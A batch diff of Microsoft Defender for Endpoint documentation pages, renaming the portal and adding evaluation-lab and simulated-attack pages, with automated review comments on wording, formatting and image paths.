+| **iOS** | [App-based](../defender-endpoint/ios-install.md) |
+| **Android** | [Microsoft Endpoint Manager](../defender-endpoint/android-intune.md) |
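Review bot: The H1 "Pilot MDE Evaluation" doesn't match the front-matter title "Pilot Defender for Endpoint evaluation", and the description and keywords are copied from the Microsoft 365 Defender evaluation pages ("Enable your Microsoft 365 Defender trial lab"), so search results and the page header will describe a different product than the body. The opening NOTE says the scenario only covers Microsoft Endpoint Configuration Manager, but Step 2 then documents every onboarding tool for every platform; pick one framing or reword the note to say the table is a reference and the walkthrough uses Configuration Manager. The table separator row "|--||" is malformed and should be "|--|--|" for the table to render. Minor: in Step 1 both items are numbered "1."; markdown will renumber them, but the second one is an alternative rather than a next step and reads better as "Alternatively, ..." under a single item or as a bullet.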
security Evaluate Defender Endpoint Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-defender-endpoint-overview.md
+
+ Title: Evaluate Microsoft 365 Defender for Endpoint overview
+description: Set up a Microsoft 365 Defender trial lab or pilot environment. Test and experience how the security solution is designed to protect devices, identity, data, and apps in your organization.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate Microsoft 365 Defender for Endpoint overview
+
+**Applies to:**
+
+- Microsoft 365 Defender
+
+![Microsoft 365 Defender evaluation and piloting process](../../media/defender/m365-defender-eval-process.png)
+
+Comprehensive security product evaluations can be a complex process, requiring cumbersome environment and device configurations before an end-to-end attack simulation can actually be done. Adding to the complexity is the challenge of tracking where the simulation activities, alerts, and results are reflected during the evaluation.
+
+The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the complexities of device and environment configuration. This enables you to:
+
+- Focus on evaluating the capabilities of the platform
+- Run simulations
+- See the prevention, detection, and remediation features in action
+<br>
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4woug]
+
+Using the simplified set-up experience, you can focus on running your own test scenarios and the pre-made simulations to see how Defender for Endpoint performs.
+
+You'll have full access to the powerful capabilities of the platform such as automated investigations, advanced hunting, and threat analytics, allowing you to test the comprehensive protection stack that Defender for Endpoint offers.
+
+You can add Windows 10 or Windows Server 2019 devices that come pre-configured to have the latest OS versions and the right security components in place as well as Office 2019 Standard installed.
+
+You can also install threat simulators. Defender for Endpoint has partnered with industry leading threat simulation platforms to help you test out the Defender for Endpoint capabilities without having to leave the portal.
+
+ Install your preferred simulator, run scenarios within the evaluation lab, and then instantly see how the platform performs. This capability is all conveniently available at no extra cost to you. You'll also have convenient access to wide array of simulations, which you can access and run from the simulations catalog.
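Review bot: The title and H1 call the product "Microsoft 365 Defender for Endpoint", which isn't a product name; the body consistently says "Microsoft Defender for Endpoint" and the page is about its evaluation lab, so the title, the "Applies to" line (currently "Microsoft 365 Defender") and the description copied from the Microsoft 365 Defender pages should all say Microsoft Defender for Endpoint. There is a stray "<br>" after the bullet list, the last paragraph has a leading space, and "wide array of simulations" needs "a".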
security Evaluate Defender Endpoint Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-defender-endpoint-pilot.md
+
+ Title: Experience Microsoft Defender for Endpoint (MDE) through simulated attacks
+description: Pilot your Microsoft 365 Defender trial lab or pilot environment.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Experience Microsoft Defender for Endpoint (MDE) through simulated attacks
+
+>[!TIP]
+>
+>- Learn about the latest enhancements in Microsoft Defender for Endpoint: [What's new in Defender for Endpoint?](https://cloudblogs.microsoft.com/microsoftsecure/2018/11/15/whats-new-in-windows-defender-atp/).
+>- Defender for Endpoint demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation. Read: [Insights from the MITRE ATT&CK-based evaluation](https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/insights-from-the-mitre-attack-based-evaluation-of-windows-defender-atp/).
+
+You might want to experience Defender for Endpoint before you onboard more than a few devices to the service. To do this, you can run controlled attack simulations on a few test devices. After running the simulated attacks, you can review how Defender for Endpoint surfaces malicious activity and explore how it enables an efficient response.
+
+## Before you begin
+
+To run any of the provided simulations, you need at least [one onboarded device](onboard-configure.md).
+
+Read the walkthrough document provided with each attack scenario. Each document includes OS and application requirements as well as detailed instructions that are specific to an attack scenario.
+
+## Run a simulation
+
+1. In **Help** > **Simulations & tutorials**, select which of the available attack scenarios you would like to simulate:
+
+ - **Scenario 1: Document drops backdoor** - simulates delivery of a socially engineered lure document. The document launches a specially crafted backdoor that gives attackers control.
+
+ - **Scenario 2: PowerShell script in fileless attack** - simulates a fileless attack that relies on PowerShell, showcasing attack surface reduction and device learning detection of malicious memory activity.
+
+ - **Scenario 3: Automated incident response** - triggers automated investigation, which automatically hunts for and remediates breach artifacts to scale your incident response capacity.
+
+2. Download and read the corresponding walkthrough document provided with your selected scenario.
+
+3. Download the simulation file or copy the simulation script by navigating to **Help** > **Simulations & tutorials**. You can choose to download the file or script on the test device but it's not mandatory.
+
+4. Run the simulation file or script on the test device as instructed in the walkthrough document.
+
+> [!NOTE]
+> Simulation files or scripts mimic attack activity but are actually benign and will not harm or compromise the test device.
+>
+
+## ALTERNATE TOPIC TEXT
+
+## Simulate attack scenarios
+
+Use the test devices to run your own attack simulations by connecting to them.
+
+You can simulate attack scenarios using:
+
+- The ["Do It Yourself" attack scenarios](https://securitycenter.windows.com/tutorials)
+- Threat simulators
+
+You can also use [Advanced hunting](advanced-hunting-overview.md) to query data and [Threat analytics](threat-analytics.md) to view reports about emerging threats.
+
+### Do-it-yourself attack scenarios
+
+If you are looking for a pre-made simulation, you can use our ["Do It Yourself" attack scenarios](https://securitycenter.windows.com/tutorials). These scripts are safe, documented, and easy to use. These scenarios will reflect Defender for Endpoint capabilities and walk you through investigation experience.
+
+>[!NOTE]
+>The connection to the test devices is done using RDP. Make sure that your firewall settings allow RDP connections.
+
+1. Connect to your device and run an attack simulation by selecting **Connect**.
+
+ ![Image of the connect button for test devices](images/test-machine-table.png)
+
+2. Save the RDP file and launch it by selecting **Connect**.
+
+ ![Image of remote desktop connection](images/remote-connection.png)
+
+ >[!NOTE]
+ >If you don't have a copy of the password saved during the initial setup, you can reset the password by selecting **Reset password** from the menu:
+ > ![Image of reset password](images/reset-password-test-machine.png)
+ >
+ > The device will change itΓÇÖs state to ΓÇ£Executing password reset", then youΓÇÖll be presented with your new password in a few minutes.
+
+3. Enter the password that was displayed during the device creation step.
+
+ ![Image of window to enter credentials](images/enter-password.png)
+
+4. Run Do-it-yourself attack simulations on the device.
+
+### Threat simulator scenarios
+
+If you chose to install any of the supported threat simulators during the lab setup, you can run the built-in simulations on the evaluation lab devices.
+
+Running threat simulations using third-party platforms is a good way to evaluate Microsoft Defender for Endpoint capabilities within the confines of a lab environment.
+
+>[!NOTE]
+>
+>Before you can run simulations, ensure the following requirements are met:
+
+>- Devices must be added to the evaluation lab
+>- Threat simulators must be installed in the evaluation lab
+
+1. From the portal select **Create simulation**.
+
+2. Select a threat simulator.
+
+ ![Image of threat simulator selection](images/select-simulator.png)
+
+3. Choose a simulation or look through the simulation gallery to browse through the available simulations.
+
+ You can get to the simulation gallery from:
+ - The main evaluation dashboard in the **Simulations overview** tile or
+ - By navigating from the navigation pane **Evaluation and tutorials** > **Simulation & tutorials**, then select **Simulations catalog**.
+
+4. Select the devices where you'd like to run the simulation on.
+
+5. Select **Create simulation**.
+
+6. View the progress of a simulation by selecting the **Simulations** tab. View the simulation state, active alerts, and other details.
+
+ ![Image of simulations tab](images/simulations-tab.png)
+<br>
+
+After running your simulations, we encourage you to walk through the lab progress bar and explore **Microsoft Defender for Endpoint triggered an automated investigation and remediation**. Check out the evidence collected and analyzed by the feature.
+
+Hunt for attack evidence through advanced hunting by using the rich query language and raw telemetry and check out some world-wide threats documented in Threat analytics.
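Review bot: The page ships two alternative bodies separated by a leftover editorial heading "## ALTERNATE TOPIC TEXT"; one of them (the on-device DIY flow under "Run a simulation" or the evaluation-lab RDP flow under "Simulate attack scenarios") needs to be removed before merge, since they cover overlapping steps for different portal surfaces. Other points: the TIP at the top links 2018 posts as "the latest enhancements" and "the recent MITRE evaluation"; the DIY scenario links point at securitycenter.windows.com/tutorials while this same batch migrates other pages to the Microsoft 365 Defender portal; the line "The device will change itΓÇÖs state to ΓÇ£Executing password reset"" has mis-encoded characters and should read "its state to "Executing password reset""; and the requirements NOTE under "Threat simulator scenarios" is split by a blank line, so its bullet lines render outside the callout. On the firewall note, "Make sure that your firewall settings allow RDP connections" would be safer as "allow outbound RDP to the evaluation lab devices", so readers don't open RDP more broadly than the lab needs.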
security Linux Install Manually https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-manually.md
In order to preview new features and provide early feedback, it is recommended t
## Download the onboarding package
-Download the onboarding package from Microsoft Defender Security Center:
+Download the onboarding package from Microsoft 365 Defender portal:
-1. In Microsoft Defender Security Center, go to **Settings > Device Management > Onboarding**.
-2. In the first drop-down menu, select **Linux Server** as the operating system. In the second drop-down menu, select **Local Script (for up to 10 devices)** as the deployment method.
+1. In the Microsoft 365 Defender portal, go to **Settings > Endpoints > Device management > Onboarding**.
+2. In the first drop-down menu, select **Linux Server** as the operating system. In the second drop-down menu, select **Local Script** as the deployment method.
3. Select **Download onboarding package**. Save the file as WindowsDefenderATPOnboardingPackage.zip.
- ![Microsoft Defender Security Center screenshot](images/atp-portal-onboarding-linux.png)
+ ![Microsoft 365 Defender portal screenshot](images/atp-portal-onboarding-linux.png)
4. From a command prompt, verify that you have the file. Extract the contents of the archive:
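Review bot: The new deployment-method label is "Local Script" with the "(for up to 10 devices)" qualifier dropped, while the onboarding table added in evaluate-defender-endpoint-enable.md in this same batch still says "Local script (up to 10 devices)"; if the portal no longer shows the limit, update that table too, otherwise keep the qualifier here so the two pages agree.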
Download the onboarding package from Microsoft Defender Security Center:
To test out the functionalities of EDR for Linux, follow the steps below to simulate a detection on your Linux server and investigate the case.
-1. Verify that the onboarded Linux server appears in Microsoft Defender Security Center. If this is the first onboarding of the machine, it can take up to 20 minutes until it appears.
+1. Verify that the onboarded Linux server appears in Microsoft 365 Defender. If this is the first onboarding of the machine, it can take up to 20 minutes until it appears.
2. Download and extract the [script file](https://aka.ms/LinuxDIY) to an onboarded Linux server and run the following command: `./mde_linux_edr_diy.sh`
-3. After a few minutes, a detection should be raised in Microsoft Defender Security Center.
+3. After a few minutes, a detection should be raised in Microsoft 365 Defender.
4. Look at the alert details, machine timeline, and perform your typical investigation steps.
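Review bot: Step 2 has the reader download the script from aka.ms/LinuxDIY and run "./mde_linux_edr_diy.sh" without saying to inspect it first or what to do if the extracted file isn't executable; suggest adding "review the script contents before running it", a "chmod +x mde_linux_edr_diy.sh" (or "bash mde_linux_edr_diy.sh") fallback, and an explicit statement that this should be run on a test server, since the purpose of the step is to raise a detection and the portal name change in this hunk is the only thing that was touched.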
security Machine Groups https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-groups.md
As part of the process of creating a device group, you'll:
## Create a device group
-1. In the navigation pane, select **Settings** > **Device groups**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Permissions** > **Device groups**.
2. Click **Add device group**.
security Machine Tags https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-tags.md
To add device tags using API, see [Add or remove device tags API](add-or-remove-
2. Select **Manage Tags** from the row of Response actions.
- ![Image of manage tags button](images/manage-tags.png)
+ :::image type="content" alt-text="Image of manage tags button." source="images/manage-tags-option.png":::
3. Type to find or create tags
- ![Image of adding tags on a device1](images/new-tags.png)
+ :::image type="content" alt-text="Image of adding tags on a device1." source="images/create-new-tag.png":::
Tags are added to the device view and will also be reflected on the **Devices list** view. You can then use the **Tags** filter to see the relevant list of devices.
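Review bot: The new alt text "Image of adding tags on a device1." carries over the stray "1" from the old caption, and both alt texts begin with "Image of", which screen readers already announce; suggest "Manage tags option on the device page." and "Creating a new tag for a device." so the text describes the content rather than the medium.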
Tags are added to the device view and will also be reflected on the **Devices li
You can also delete tags from this view.
-![Image of adding tags on a device2](images/more-manage-tags.png)
## Add device tags by setting a registry key value
security Manage Automation File Uploads https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-file-uploads.md
For example, if you add *exe* and *bat* as file or attachment extension names, t
## Add file extension names and attachment extension names.
-1. In the navigation pane, select **Settings** > **Automation file uploads**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Automation uploads**.
2. Toggle the content analysis setting between **On** and **Off**.
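Review bot: The unchanged heading "Add file extension names and attachment extension names." ends with a period that no other heading in this batch uses; drop it while touching this section. Step 2 ("Toggle the content analysis setting between On and Off") is the switch that decides whether files with the listed extensions are uploaded for analysis, so one sentence on what Off means for automated investigation would help the reader choose.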
security Manage Automation Folder Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-folder-exclusions.md
You can specify the file names that you want to be excluded in a specific direct
## Add an automation folder exclusion
-1. In the navigation pane, select **Settings** > **Automation folder exclusions**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Automation folder exclusions**.
2. Click **New folder exclusion**.
You can specify the file names that you want to be excluded in a specific direct
- Extensions - File names - Description
-
4. Click **Save**.
You can specify the file names that you want to be excluded in a specific direct
> Live Response commands to collect or examine excluded files will fail with error: "File is excluded". In addition, automated investigations will ignore the excluded items. ## Edit an automation folder exclusion
-1. In the navigation pane, select **Settings** > **Automation folder exclusions**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Automation folder exclusions**.
2. Click **Edit** on the folder exclusion. 3. Update the details of the rule and click **Save**. ## Remove an automation folder exclusion
-1. In the navigation pane, select **Settings** > **Automation folder exclusions**.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Automation folder exclusions**.
2. Click **Remove exclusion**.
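Review bot: The NOTE that "automated investigations will ignore the excluded items" and that Live Response "will fail with error: File is excluded" is the main security consequence of this feature, and it currently sits between the Add and Edit procedures where it is easy to miss; suggest moving it to the top of the page and adding that exclusions should be scoped as narrowly as possible (specific file names or extensions within a directory rather than whole directories) and reviewed periodically, because anything written into an excluded location is invisible to automated investigation from then on. The path updates themselves look consistent across the three hunks.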
security Manage Suppression Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-suppression-rules.md
There might be scenarios where you need to suppress alerts from appearing in the
You can view a list of all the suppression rules and manage them in one place. You can also turn an alert suppression rule on or off.
-1. In the navigation pane, select **Settings** > **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
2. Select a rule by clicking on the check-box beside the rule name.
You can view a list of all the suppression rules and manage them in one place. Y
## View details of a suppression rule
-1. In the navigation pane, select **Settings** > **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
+1. In the navigation pane, select **Settings** > **Endpoints** > **Rules** > **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
2. Click on a rule name. Details of the rule is displayed. You'll see the rule details such as status, scope, action, number of matching alerts, created by, and date when the rule was created. You can also view associated alerts and the rule conditions.
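Review bot: In the unchanged step 2 of View details, "Details of the rule is displayed" should be "Details of the rule are displayed"; worth fixing while this section is being edited for the new navigation path.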
security Switch To Microsoft Defender Migration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-microsoft-defender-migration.md
The process of migrating to Defender for Endpoint can be divided into three phas
|Phase |Description | |--|--|
-|[Prepare for your migration](switch-to-microsoft-defender-prepare.md) |During [the **Prepare** phase](switch-to-microsoft-defender-prepare.md): <p>1. Update your organization's devices. <p>2. Get Defender for Endpoint. <p>3. Plan your roles and permissions, and grant access to the Microsoft Defender Security Center. <p>4. Configure your device proxy and internet settings to enable communication between your organization's devices and Defender for Endpoint. |
+|[Prepare for your migration](switch-to-microsoft-defender-prepare.md) |During [the **Prepare** phase](switch-to-microsoft-defender-prepare.md): <p>1. Update your organization's devices. <p>2. Get Defender for Endpoint. <p>3. Plan your roles and permissions, and grant access to the Microsoft 365 Defender portal. <p>4. Configure your device proxy and internet settings to enable communication between your organization's devices and Defender for Endpoint. |
|[Set up Defender for Endpoint](switch-to-microsoft-defender-setup.md) |During [the **Setup** phase](switch-to-microsoft-defender-setup.md): <p>1. Enable/reinstall Microsoft Defender Antivirus. <p>2. Configure Defender for Endpoint. <p>3. Add Defender for Endpoint to the exclusion list for your existing solution. <p>4. Add your existing solution to the exclusion list for Microsoft Defender Antivirus. <p>5. Set up your device groups, collections, and organizational units. <p>6. Configure your antimalware policies and real-time protection settings.| |[Onboard to Defender for Endpoint](switch-to-microsoft-defender-onboard.md) |During [the **Onboard** phase](switch-to-microsoft-defender-onboard.md): <p>1. Onboard your devices to Defender for Endpoint. <p>2. Run a detection test. <p>3. Confirm that Microsoft Defender Antivirus is running in passive mode. <p>4. Get updates for Microsoft Defender Antivirus. <p>5. Uninstall your existing endpoint protection solution. <p>6. Make sure that Defender for Endpoint working correctly. |
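Review bot: Only the Prepare row was updated, but the Onboard row in the same table still reads "6. Make sure that Defender for Endpoint working correctly", which is missing "is"; fix it in the same change so the table isn't touched twice.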
security Tvm Microsoft Secure Score Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tvm-microsoft-secure-score-devices.md
ms.technology: mde
>[!NOTE] > Configuration score is now part of threat and vulnerability management as Microsoft Secure Score for Devices.
-Your score for devices is visible in the [threat and vulnerability management dashboard](tvm-dashboard-insights.md) of the Microsoft Defender Security Center. A higher Microsoft Secure Score for Devices means your endpoints are more resilient from cybersecurity threat attacks. It reflects the collective security configuration state of your devices across the following categories:
+Your score for devices is visible in the [threat and vulnerability management dashboard](tvm-dashboard-insights.md) of the Microsoft 365 Defender portal. A higher Microsoft Secure Score for Devices means your endpoints are more resilient from cybersecurity threat attacks. It reflects the collective security configuration state of your devices across the following categories:
- Application - Operating system
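Review bot: The swapped line keeps the phrase "more resilient from cybersecurity threat attacks", which should read "more resilient to cyberattacks" (resilient takes "to", and "threat attacks" is redundant); since the sentence is being rewritten for the portal rename anyway, tidy it here.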
Forward Microsoft Defender for Endpoint signals, giving Microsoft Secure Score v
Changes might take up to a few hours to reflect in the dashboard.
-1. In the navigation pane, go to **Settings** > **Advanced features**
+1. In the navigation pane, go to **Settings** > **Endpoints** > **General** > **Advanced features**
2. Scroll down to **Microsoft Secure Score** and toggle the setting to **On**.
The data in the Microsoft Secure Score for Devices card is the product of meticu
Improve your security configuration by remediating issues from the security recommendations list. As you do so, your Microsoft Secure Score for Devices improves and your organization becomes more resilient against cybersecurity threats and vulnerabilities.
-1. From the Microsoft Secure Score for Devices card in the threat and vulnerability management dashboard, select the one of the categories. You'll view the list of recommendations related to that category. It will take you to the [**Security recommendations**](tvm-security-recommendation.md) page. If you want to see all security recommendations, once you get to the Security recommendations page, clear the search field.
+1. From the Microsoft Secure Score for Devices card in the threat and vulnerability management dashboard, select one of the categories. You'll view the list of recommendations related to that category. It will take you to the [**Security recommendations**](tvm-security-recommendation.md) page. If you want to see all security recommendations, once you get to the Security recommendations page, clear the search field.
2. Select an item on the list. The flyout panel will open with details related to the recommendation. Select **Remediation options**.
- ![Security controls related security recommendations](images/tvm_security_controls.png)
+ :::image type="content" alt-text="Security controls related security recommendations." source="images/security-controls.png":::
3. Read the description to understand the context of the issue and what to do next. Select a due date, add notes, and select **Export all remediation activity data to CSV** so you can attach it to an email for follow-up. 4. **Submit request**. You'll see a confirmation message that the remediation task has been created.
- ![Remediation task creation confirmation](images/tvm_remediation_task_created.png)
+
+ :::image type="content" alt-text="Remediation task creation confirmation." source="images/remediation-task-created.png":::
5. Save your CSV file.
- ![Save csv file](images/tvm_save_csv_file.png)
+
+ :::image type="content" alt-text="Save csv file." source="images/tvm_save_csv_file.png":::
6. Send a follow-up email to your IT Administrator and allow the time that you've allotted for the remediation to propagate in the system.
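Review bot: the three `:::image:::` conversions in this hunk rename two of the source files but not the third: `images/tvm_security_controls.png` becomes `images/security-controls.png` and `images/tvm_remediation_task_created.png` becomes `images/remediation-task-created.png`, while the third keeps `images/tvm_save_csv_file.png`. Either the rename is incomplete or the two new paths do not exist yet; confirm all three files are present under `images/` in this commit, since a missing image source fails the build rather than just dropping the picture. While here, the unchanged line `3. Read the description ... 4. **Submit request**.` has step 4 run into step 3; splitting it onto its own line lets the numbered list render correctly.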
security Config M365d Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/config-m365d-eval.md
- Title: Configure Microsoft 365 Defender pillars for the trial lab or pilot environment
-description: Configure Microsoft 365 Defender pillars, such as Microsoft Defender for Office 365 , Microsoft Defender for Identity, Microsoft Cloud App Security, and Microsoft Defender for Endpoint, for your trial lab or pilot environment.
-keywords: configure Microsoft 365 Defender trial, Microsoft 365 Defender trial configuration, configure Microsoft 365 Defender pilot project, configure Microsoft 365 Defender pillars, Microsoft 365 Defender pillars
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-evalutatemtp
---
-# Configure Microsoft 365 Defender pillars for your trial lab or pilot environment
---
-**Applies to:**
-- Microsoft 365 Defender--
-Creating a Microsoft 365 Defender trial lab or pilot environment and deploying it is a three-phase process:
-
-|[![Phase 1: Prepare](../../medi) |
-|--|--|--|--|
-|| |*You are here!* | |
-
-You're currently in the configuration phase.
-
-Preparation is key to any successful deployment. In this article, you'll be guided on the points you'll need to consider as you prepare to deploy Microsoft Defender for Endpoint.
-
-## Microsoft 365 Defender pillars
-Microsoft 365 Defender consists of four pillars. Although one pillar can already provide value to your network organization's security, enabling the four Microsoft 365 Defender pillars will give your organization the most value.
-
-![Image of_Microsoft 365 Defender solution for users, Microsoft Defender for Identity, for endpoints Microsoft Defender for Endpoint, for cloud apps, Microsoft Cloud App Security, and for data, Microsoft Defender for Office 365](../../media/mtp/m365pillars.png)
-
-This section will guide you to configure:
--- Microsoft Defender for Office 365-- Microsoft Defender for Identity-- Microsoft Cloud App Security-- Microsoft Defender for Endpoint-
-## Configure Microsoft Defender for Office 365
-
-> [!NOTE]
-> Skip this step if you've already enabled Defender for Office 365.
-
-There's a PowerShell Module called the *Office 365 Advanced Threat Protection Recommended Configuration Analyzer (ORCA)* that helps determine some of these settings. When run as an administrator in your tenant, get-ORCAReport will help generate an assessment of the anti-spam, anti-phish, and other message hygiene settings. You can download this module from https://www.powershellgallery.com/packages/ORCA/.
-
-1. Navigate to [Office 365 Security & Compliance Center](https://protection.office.com/homepage) > **Threat management** > **Policy**.
-
- ![Image of_Office 365 Security & Compliance Center Threat management policy page](../../media/mtp-eval-32.png)
-
-2. Click **Anti-phishing**, select **Create** and fill in the policy name and description. Click **Next**.
-
- ![Image of_Office 365 Security & Compliance Center anti-phishing policy page where you can name your policy](../../media/mtp-eval-33.png)
-
- > [!NOTE]
- > Edit your Advanced anti-phishing policy in Microsoft Defender for Office 365. Change **Advanced Phishing Threshold** to **2 - Aggressive**.
-
-3. Click the **Add a condition** drop-down menu and select your domain(s) as recipient domain. Click **Next**.
-
- ![Image of_Office 365 Security & Compliance Center anti-phishing policy page where you can add a condition for its application](../../media/mtp-eval-34.png)
-
-4. Review your settings. Click **Create this policy** to confirm.
-
- ![Image of_Office 365 Security & Compliance Center anti-phishing policy page where you can review your settings and click the create this policy button](../../media/mtp-eval-35.png)
-
-5. Select **Safe Attachments** and select the **Turn on ATP for SharePoint, OneDrive, and Microsoft Teams** option.
-
- ![Image of_Office 365 Security & Compliance Center page where you can turn on ATP for SharePoint, OneDrive, and Microsoft Teams](../../media/mtp-eval-36.png)
-
-6. Click the + icon to create a new safe attachment policy, apply it as recipient domain to your domains. Click **Save**.
-
- ![Image of_Office 365 Security & Compliance Center page where you can create a new create a new safe attachment policy](../../media/mtp-eval-37.png)
-
-7. Next, select the **Safe Links** policy, then click the pencil icon to edit the default policy.
-
-8. Make sure that the **Do not track when users click safe links** option is not selected, while the rest of the options are selected. See [Safe Links settings](/microsoft-365/security/office-365-security/recommended-settings-for-eop-and-office365) for details. Click **Save**.
-
- ![Image of_Office 365 Security & Compliance Center page which shows that the option Do not track when users click safe is not selected](../../media/mtp-eval-38.png)
-
-9. Next select the **Anti-malware** policy, select the default, and choose the pencil icon.
-
-10. Click **Settings** and select **Yes and use the default notification text** to enable **Malware Detection Response**. Turn the **Common Attachment Types Filter** on. Click **Save**.
-
- ![Image of_Office 365 Security & Compliance Center page which shows that the malware detection response is turned on with default notification and the common attachment types filter is turned on](../../media/mtp-eval-39.png)
-
-11. Navigate to [Office 365 Security & Compliance Center](https://protection.office.com/homepage) > **Search** > **Audit log search** and turn Auditing on.
-
- ![Image of_Office 365 Security & Compliance Center page where you can turn on the Audit log search](../../media/mtp-eval-40.png)
-
-12. Integrate Microsoft Defender for Office 365 with Microsoft Defender for Endpoint. Navigate to [Office 365 Security & Compliance Center](https://protection.office.com/homepage) > **Threat management** > **Explorer** and select **Microsoft Defender for Endpoint Settings** on the upper right corner of the screen. In the Defender for Endpoint connection dialog box, turn on **Connect to Microsoft Defender for Endpoint**.
-
- ![Image of_Office 365 Security & Compliance Center page where you can turn Microsoft Defender for Endpoint connection on](../../media/mtp-eval-41.png)
-
-## Configure Microsoft Defender for Identity
-
-> [!NOTE]
-> Skip this step if you've already enabled Microsoft Defender for Identity
-
-1. Navigate to [Microsoft 365 Security Center](https://security.microsoft.com/info) > select **More Resources** > **Microsoft Defender for Identity**.
-
- ![Image of_Microsoft 365 Security Center page where there's an option to open Microsoft Defender for Identity](../../media/mtp-eval-42.png)
-
-2. Click **Create** to start the Microsoft Defender for Identity wizard.
-
- ![Image of_Microsoft Defender for Identity wizard page where you should click Create button](../../media/mtp-eval-43.png)
-
-3. Choose **Provide a username and password to connect to your Active Directory forest**.
-
- ![Image of_Microsoft Defender for Identity welcome page](../../media/mtp-eval-44.png)
-
-4. Enter your Active Directory on-premises credentials. This can be any user account that has read access to Active Directory.
-
- ![Image of_Microsoft Defender for Identity Directory services page where you should put your credentials](../../media/mtp-eval-45.png)
-
-5. Next, choose **Download Sensor Setup** and transfer file to your domain controller.
-
- ![Image of_Microsoft Defender for Identity page where you can select Download Sensor Setup](../../media/mtp-eval-46.png)
-
-6. Execute the Microsoft Defender for Identity Sensor Setup and begin following the wizard.
-
- ![Image of_Microsoft Defender for Identity page where you should click next to follow the Microsoft Defender for Identity sensor wizard](../../media/mtp-eval-47.png)
-
-7. Click **Next** at the sensor deployment type.
-
- ![Image of_Microsoft Defender for Identity page where you should click next to go to next page](../../media/mtp-eval-48.png)
-
-8. Copy the access key because you need to enter it next in the Wizard.
-
- ![Image of_the sensors page where you should copy the access key that you need to enter in the next Microsoft Defender for Identity sensor setup wizard page](../../media/mtp-eval-49.png)
-
-9. Copy the access key into the Wizard and click **Install**.
-
- ![Image of_Microsoft Defender for Identity sensor wizard page where you should provide the access key and then click the install button](../../media/mtp-eval-50.png)
-
-10. Congratulations, you've successfully configured Microsoft Defender for Identity on your domain controller.
-
- ![Image of_Microsoft Defender for Identity sensor wizard installation completion where you should click the finish button](../../media/mtp-eval-51.png)
-
-11. Under the [Microsoft Defender for Identity](https://go.microsoft.com/fwlink/?linkid=2040449) settings section, select **Microsoft Defender for Endpoint **, then turn on the toggle. Click **Save**.
-
- ![Image of_the Microsoft Defender for Identity settings page where you should turn the Microsoft Defender for Endpoint toggle on](../../media/mtp-eval-52.png)
-
-## Configure Microsoft Cloud App Security
-
-> [!NOTE]
-> Skip this step if you've already enabled Microsoft Cloud App Security.
-
-1. Navigate to [Microsoft 365 Security Center](https://security.microsoft.com/info) > **More Resources** > **Microsoft Cloud App Security**.
-
- ![Image of_Microsoft 365 Security Center page where you can see Microsoft Cloud App card and should click the open button](../../media/mtp-eval-53.png)
-
-2. At the information prompt to integrate Microsoft Defender for Identity, select **Enable Microsoft Defender for Identity data integration**.
-
- ![Image of_the information prompt to integrate Microsoft Defender for Identity where you should select the Enable Microsoft Defender for Identity data integration link](../../media/mtp-eval-54.png)
-
- > [!NOTE]
- > If you donΓÇÖt see this prompt, it might mean that your Microsoft Defender for Identity data integration has already been enabled. However, if you are not sure, contact your IT Administrator to confirm.
-
-3. Go to **Settings**, turn on the **Microsoft Defender for Identity integration** toggle, then click **Save**.
-
- ![Image of_the settings page where you should turn on the Microsoft Defender for Identity integration toggle then click save](../../media/mtp-eval-55.png)
-
- > [!NOTE]
